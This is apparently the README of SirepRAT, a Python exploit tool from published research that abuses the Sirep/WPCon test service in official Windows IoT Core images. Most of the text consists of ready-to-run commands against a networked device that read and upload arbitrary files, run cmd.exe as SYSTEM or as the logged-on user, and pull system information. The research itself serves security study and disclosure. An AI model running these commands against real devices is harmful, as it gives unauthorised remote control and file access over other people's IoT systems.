
SirepRAT 无需在目标上编写真正的RAT恶意软件即可实现完整的RAT功能。
该方法利用了微软官方镜像中内置并运行的Sirep测试服务。该服务是HLK设置中的客户端部分,用于对IoT设备进行驱动程序/硬件测试。它实现了Sirep/WPCon/TShell协议。
我们分析了Sirep/WPCon协议,并展示了该协议如何为攻击者暴露一个远程命令接口,包括RAT能力,如从任意位置获取/放置任意文件以及获取系统信息。
基于我们从该服务及协议研究中提取的发现,我们构建了一个简单的Python工具,利用支持的不同命令进行利用。我们将其命名为SirepRAT。
它提供了一个简单直观的用户界面,用于向Windows IoT Core目标发送命令。它适用于任何通过线缆连接、运行Windows IoT Core并使用微软官方镜像的设备。
演示文稿和研究白皮书在文档文件夹中
pip install -r requirements.txt
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
带参数,并以当前登录用户身份模拟执行:
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
(尝试不使用 as_logged_on_user 标志运行,以演示SYSTEM执行能力)
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"
python SirepRAT.py --help
Dor Azouri (@bemikre)
movatica (@movatica) - 移植到Python 3!(在2020年终点线前完成)
BSD 3 - “新”或“修订”条款许可证